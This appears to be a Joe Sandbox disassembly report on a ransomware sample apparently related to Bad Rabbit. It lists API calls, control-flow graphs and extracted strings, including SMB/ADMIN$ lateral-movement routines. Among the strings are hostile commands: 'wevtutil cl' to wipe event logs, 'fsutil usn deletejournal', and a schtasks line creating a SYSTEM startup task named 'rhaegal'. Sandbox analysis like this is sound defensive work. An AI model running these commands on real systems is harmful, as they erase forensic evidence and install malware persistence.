                                              control_flow_graph 437 4bf5337-4bf535f GetProcessHeap HeapAlloc 438 4bf54fd-4bf5504 437->438 439 4bf5365-4bf538f rand 437->439 440 4bf5398-4bf53bf rand socket 439->440 441 4bf5391-4bf5397 439->441 442 4bf54ed-4bf54f7 GetProcessHeap HeapFree 440->442 443 4bf53c5-4bf5400 htons inet_addr connect 440->443 441->440 442->438 444 4bf54df 443->444 445 4bf5406-4bf5416 call 4bf1ca3 443->445 446 4bf54e6-4bf54e7 closesocket 444->446 449 4bf54dc 445->449 450 4bf541c-4bf5432 call 4bf2191 445->450 446->442 449->444 453 4bf5438-4bf5457 call 4bf46c7 call 4bf21dc 450->453 454 4bf54c6 450->454 461 4bf545c-4bf5460 453->461 456 4bf54cd-4bf54d2 call 4bf1dd1 454->456 460 4bf54d7-4bf54da 456->460 460->446 461->456 462 4bf5462-4bf547c call 4bf1eb9 461->462 462->456 465 4bf547e-4bf5492 call 4bf2054 462->465 465->456 468 4bf5494-4bf54aa call 4bf4ab5 465->468 468->456 471 4bf54ac-4bf54be call 4bf516b 468->471 471->456 474 4bf54c0-4bf54c4 471->474 474->456
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,771ADFF0,00000000,?,?,?,?,04BF943A,?), ref: 04BF534B
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF5352
                                              • rand.MSVCRT ref: 04BF5388
                                              • rand.MSVCRT ref: 04BF53A8
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 04BF53B4
                                              • htons.WS2_32(000001BD), ref: 04BF53DA
                                              • inet_addr.WS2_32(?), ref: 04BF53E7
                                              • connect.WS2_32(00000000,?,00000010), ref: 04BF53F7
                                                • Part of subcall function 04BF516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04BF51D3
                                                • Part of subcall function 04BF516B: HeapAlloc.KERNEL32(00000000), ref: 04BF51DC
                                                • Part of subcall function 04BF516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04BF5205
                                                • Part of subcall function 04BF516B: HeapAlloc.KERNEL32(00000000), ref: 04BF5208
                                                • Part of subcall function 04BF516B: rand.MSVCRT ref: 04BF521B
                                                • Part of subcall function 04BF516B: rand.MSVCRT ref: 04BF5226
                                                • Part of subcall function 04BF516B: rand.MSVCRT ref: 04BF522F
                                                • Part of subcall function 04BF516B: sprintf.MSVCRT ref: 04BF5246
                                                • Part of subcall function 04BF516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5252
                                                • Part of subcall function 04BF516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5255
                                              • closesocket.WS2_32(00000000), ref: 04BF54E7
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A,?), ref: 04BF54F0
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF54F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                              • String ID: ADMIN$$cscc.dat
                                              • API String ID: 228017060-1100196981
                                              • Opcode ID: c2106cf46260ba3c8f1bf6541ec01f76adf708b6b31dfeadef89843603cb8de8
                                              • Instruction ID: b770371e464bbd7867f9ab1895a7a8dab792687c869dd130c90ec932c572b813
                                              • Opcode Fuzzy Hash: c2106cf46260ba3c8f1bf6541ec01f76adf708b6b31dfeadef89843603cb8de8
                                              • Instruction Fuzzy Hash: FB514F71900319BBDF209FA4DC48EEF7B7DEF08355F004955BA1AA7151D775AA08CB60
                                              Function 04BF1CA3 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 108memorynetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 489 4bf1ca3-4bf1ccd GetProcessHeap RtlAllocateHeap 490 4bf1dc7-4bf1dce 489->490 491 4bf1cd3-4bf1ce0 GetProcessHeap HeapAlloc 489->491 492 4bf1ce6-4bf1d2e htons send 491->492 493 4bf1db5-4bf1dc1 GetProcessHeap HeapFree 491->493 494 4bf1da5-4bf1daf GetProcessHeap HeapFree 492->494 495 4bf1d30-4bf1d45 recv 492->495 493->490 494->493 495->494 496 4bf1d47-4bf1d4a 495->496 496->494 497 4bf1d4c-4bf1d60 call 4bf1c3a 496->497 497->494 500 4bf1d62-4bf1d66 497->500 501 4bf1d6b 500->501 502 4bf1d6d-4bf1d81 call 4bf1747 501->502 504 4bf1d86-4bf1d8b 502->504 504->494 505 4bf1d8d-4bf1d96 504->505 505->502 506 4bf1d98-4bf1da3 505->506 506->494 506->501
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04BF5414,00000000,?,0BADF00D,?,?,?,?,04BF943A,?), ref: 04BF1CBD
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,04BF943A,?), ref: 04BF1CC6
                                              • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,04BF943A,?), ref: 04BF1CD7
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF1CDA
                                              • htons.WS2_32(0000002F), ref: 04BF1CF7
                                              • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04BF1D26
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF1D3D
                                                • Part of subcall function 04BF1747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04BF1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04BF1783
                                                • Part of subcall function 04BF1747: HeapAlloc.KERNEL32(00000000), ref: 04BF178C
                                                • Part of subcall function 04BF1747: CharUpperW.USER32(00000000), ref: 04BF17B2
                                                • Part of subcall function 04BF1747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 04BF17DA
                                                • Part of subcall function 04BF1747: HeapAlloc.KERNEL32(00000000), ref: 04BF17DD
                                                • Part of subcall function 04BF1747: htons.WS2_32(00000082), ref: 04BF1801
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A,?), ref: 04BF1DA8
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF1DAF
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04BF943A,?), ref: 04BF1DBA
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF1DC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Freehtons$AllocateCharUpperrecvsend
                                              • String ID: NT LM 0.12$x
                                              • API String ID: 30026595-3673895198
                                              • Opcode ID: bcd3d4be776394c94530cd57324ef0f16b4aaff364ebfdc124baac7240a54365
                                              • Instruction ID: 75731b55b1be04af54b62485a45330eaeec43351c0d7d338acff6ae23d326a22
                                              • Opcode Fuzzy Hash: bcd3d4be776394c94530cd57324ef0f16b4aaff364ebfdc124baac7240a54365
                                              • Instruction Fuzzy Hash: 5931BD36900249FBEF128FE8DC48B5A7F79EF45310F048495FA09AB191C675A909DB60
                                              Function 04BF733C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 04BF734A
                                              • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04BF7363
                                              • GetProcessHeap.KERNEL32(00000008,00100000), ref: 04BF737E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04BF7385
                                              • wsprintfW.USER32 ref: 04BF73DC
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF7405
                                              • RtlFreeHeap.NTDLL(00000000), ref: 04BF740C
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF7856), ref: 04BF7414
                                              • FreeLibrary.KERNEL32(?), ref: 04BF741D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorLastLoadProcwsprintf
                                              • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                              • API String ID: 2876140663-442984071
                                              • Opcode ID: dadeb3dd69f4cbfa96e2c51bf08f1e7d6bdfa640d9e8f57fbd0998c9b5db4e97
                                              • Instruction ID: 0e230ad930161d3d8cf6293b7861b9a75311a4345201c0b470329a52dbb060ea
                                              • Opcode Fuzzy Hash: dadeb3dd69f4cbfa96e2c51bf08f1e7d6bdfa640d9e8f57fbd0998c9b5db4e97
                                              • Instruction Fuzzy Hash: F0217172900215ABDB115FE8CC49EAEBBBDEF48701F0445A6F646E6141DB78E905CBB0
                                              Function 04BF9154 Relevance: 19.6, APIs: 13, Instructions: 81memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNELBASE ref: 04BF9161
                                              • CreateFileW.KERNELBASE(04C07BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04BF9198
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 04BF91A3
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04BF91AF
                                              • CreateFileW.KERNELBASE(04C07BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04BF91C1
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF91D5
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04BF91D8
                                              • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 04BF91F1
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF91FB
                                              • HeapFree.KERNEL32(00000000), ref: 04BF91FE
                                              • CloseHandle.KERNEL32(?), ref: 04BF9207
                                              • DeleteFileW.KERNELBASE(04C07BC8), ref: 04BF920E
                                              • ExitProcess.KERNEL32 ref: 04BF9234
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                              • String ID:
                                              • API String ID: 1556359713-0
                                              • Opcode ID: be27338553d60d296b198343f59c8388b5b9b6600502c83c885eb8fdc06cadb6
                                              • Instruction ID: 47fec448fed7ea1903348fc843eac067f1447da1a7d09fcfcf78eb36f1abd25b
                                              • Opcode Fuzzy Hash: be27338553d60d296b198343f59c8388b5b9b6600502c83c885eb8fdc06cadb6
                                              • Instruction Fuzzy Hash: CF2116B5802214BBEF116FE1EC4CE8EBF7DEF49311F104452F60AA2150C638AA51DBA0
                                              Function 04BF808E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: wsprintf
                                              • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                              • API String ID: 2111968516-1905612841
                                              • Opcode ID: 095a60731879542afedfb59fa2e0650a0fdae23437b7210772c4d33245ce71f3
                                              • Instruction ID: 84b9e5713051b9f5c1018aca3d178203c49c28a646d93d655983ca094f65b7b2
                                              • Opcode Fuzzy Hash: 095a60731879542afedfb59fa2e0650a0fdae23437b7210772c4d33245ce71f3
                                              • Instruction Fuzzy Hash: 1C118666A003286ADB60D6A8CC89EE7B7ACDF44750F4045A1F95CD3141EE74EE848BB5
                                              Function 04BF1DD1 Relevance: 18.1, APIs: 12, Instructions: 84memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1DE9
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1DF2
                                              • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E04
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E07
                                              • htons.WS2_32(00000027), ref: 04BF1E21
                                              • send.WS2_32(?,00000000,0000002B,00000000), ref: 04BF1E4A
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF1E63
                                              • memset.MSVCRT ref: 04BF1E81
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E90
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1E97
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1EA2
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04BF1EA9
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                              • String ID:
                                              • API String ID: 255267840-0
                                              • Opcode ID: e96ce8209db497fcd673f2ea4444cefbf865205a8af8933b506c4320cbe7d9c5
                                              • Instruction ID: 4d58c234c1e879c51dd38837840a60d52784987c528cc0b4a46f5cddca857b59
                                              • Opcode Fuzzy Hash: e96ce8209db497fcd673f2ea4444cefbf865205a8af8933b506c4320cbe7d9c5
                                              • Instruction Fuzzy Hash: 5E218071600205BBEB109FE9DC49F6A7B6CFF49714F04449ABA0D9B291DBB9EC08C764
                                              Function 04BF2054 Relevance: 16.6, APIs: 11, Instructions: 110memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF206D
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2076
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04BF943A), ref: 04BF209C
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF209F
                                              • htons.WS2_32(?), ref: 04BF20BC
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF2131
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF2148
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A), ref: 04BF2168
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF216F
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04BF943A), ref: 04BF217A
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2181
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                              • String ID:
                                              • API String ID: 1780562090-0
                                              • Opcode ID: 8abed9437c2e9288aa39dcae853dc1889b7a284a84c20090a0b9f5e489533b73
                                              • Instruction ID: c7727e251d23ad857ca585f21d563f7b2e577e955bd90a2b642f5d12c7ea1fdf
                                              • Opcode Fuzzy Hash: 8abed9437c2e9288aa39dcae853dc1889b7a284a84c20090a0b9f5e489533b73
                                              • Instruction Fuzzy Hash: BA41B27550024AABDF158FA8DD88B9A7FB8EF49300F0440D9FE499B291DB79D909CB60
                                              Function 04BF8A6F Relevance: 16.6, APIs: 11, Instructions: 77sleepmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemMetrics.USER32(00002000), ref: 04BF8A81
                                              • Sleep.KERNELBASE(000001F4), ref: 04BF8A90
                                              • GetSystemMetrics.USER32(00002000), ref: 04BF8A93
                                              • SetEvent.KERNEL32(?), ref: 04BF8A9C
                                              • Sleep.KERNEL32(000003E8), ref: 04BF8AAB
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AD4
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AE1
                                              • inet_ntoa.WS2_32(00000000), ref: 04BF8AE4
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 04BF8B02
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 04BF8B09
                                              • LocalFree.KERNEL32(?), ref: 04BF8B1F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                              • String ID:
                                              • API String ID: 4223591894-0
                                              • Opcode ID: 8b8295a8577439c35ac12d8237db281bd8477087bcaec5675e226302a2deba27
                                              • Instruction ID: 18a85304b959bca9cd21e5f8824d01c6379cba02d8ff4b9cc5a0c4358cd21cd0
                                              • Opcode Fuzzy Hash: 8b8295a8577439c35ac12d8237db281bd8477087bcaec5675e226302a2deba27
                                              • Instruction Fuzzy Hash: B8116071610315BBEB11BFA5DC88D5FB7ACEF493507044466F60AA7101DB78FD059AB0
                                              Function 04BF7FB7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80sleepprocessstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF7FD6
                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                              • Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                              • String ID: /c %ws$ComSpec$\cmd.exe
                                              • API String ID: 1518394870-1564754240
                                              • Opcode ID: 9c1540824acc20e8e5e3511de12a6f0eb29345b3e81e84cdb128529498a2a0eb
                                              • Instruction ID: fe85e8ede551eee11ef0d72cd962400dab281d1085e40ccc1c295057ee19eee5
                                              • Opcode Fuzzy Hash: 9c1540824acc20e8e5e3511de12a6f0eb29345b3e81e84cdb128529498a2a0eb
                                              • Instruction Fuzzy Hash: 442195726001086FDB20DBB5DC88EEB77ADEB94345F004466F94AE7140E635DE588B70
                                              Function 04BF1000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52sleepstringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF7FB7: wsprintfW.USER32 ref: 04BF7FD6
                                                • Part of subcall function 04BF7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                                • Part of subcall function 04BF7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                                • Part of subcall function 04BF7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                                • Part of subcall function 04BF7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                                • Part of subcall function 04BF7FB7: Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04BF1021
                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04BF1039
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04BF104B
                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF1061
                                              • wsprintfW.USER32 ref: 04BF1087
                                              Strings
                                              • ComSpec, xrefs: 04BF1034
                                              • schtasks /Delete /F /TN rhaegal, xrefs: 04BF100E
                                              • \cmd.exe, xrefs: 04BF1055
                                              • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04BF1081
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                              • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                              • API String ID: 2538701606-2521368254
                                              • Opcode ID: 5aa9c151c63c5150e641f44138ba31c9a67cbafa1b9790aa85a97b551978906f
                                              • Instruction ID: 09a5dbde469b8e26176b425c3685251fb7a029749ef3ca5ddf983143c6133abf
                                              • Opcode Fuzzy Hash: 5aa9c151c63c5150e641f44138ba31c9a67cbafa1b9790aa85a97b551978906f
                                              • Instruction Fuzzy Hash: B60196766012186BDB205BBADC08FDB767DDB85705F0000A2BA0EE3141DA74EA58CFB0
                                              Function 04BF11EF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04BF1204
                                              • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 04BF124F
                                              • memmove.MSVCRT ref: 04BF1302
                                              • memcpy.MSVCRT ref: 04BF1315
                                              • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04BF1334
                                              • RegFlushKey.ADVAPI32(00000800), ref: 04BF1344
                                              • RegCloseKey.KERNELBASE(00000800), ref: 04BF1359
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                              • String ID: cscc
                                              • API String ID: 3731182797-3289078142
                                              • Opcode ID: b31aeedd5c150575a3ff6330002729709104f7ac0859d38e511542284a03842e
                                              • Instruction ID: 10659fa08eb4e7aaa4c2288672c7db822bf30f52d27d6cb3576935b8cb19be94
